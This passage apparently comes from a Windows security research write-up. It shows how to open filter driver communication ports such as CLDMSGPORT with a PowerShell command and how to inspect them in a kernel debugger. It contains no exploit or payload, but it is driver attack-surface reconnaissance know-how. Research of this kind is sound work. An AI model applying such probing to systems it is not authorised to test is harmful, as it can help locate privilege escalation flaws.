We can see two ports output in the previous code snippet. The BindFltPort port fails with an access denied error, while the CLDMSGPORT port (which is part of the Cloud Filter driver) returns “The cloud operation is invalid.”. The second error indicates that we’ve likely opened the port, but you’ll need to supply specific parameters in the context buffer when calling the FilterConnectCommunicationPort API. You can specify the connection context for the Get-FilterConnectionPort command by specifying a byte array to the Context parameter.

PS> $port = Get-FilterConnectionPort -Path "\PORT" -Context @(0, 1, 2, 3)

We can inspect the security descriptor for a port if you’ve got a Windows system with a kernel debugger enabled and a copy of WinDBG.

0: kd> !object \CLDMSGPORT

Object: ffffb487447ff8c0  Type: (ffffb4873d67dc40) FilterConnectionPort

    ObjectHeader: ffffb487447ff890 (new version)

    HandleCount: 1  PointerCount: 4

    Directory Object: ffff8a8889a2d4e0  Name: CLDMSGPORT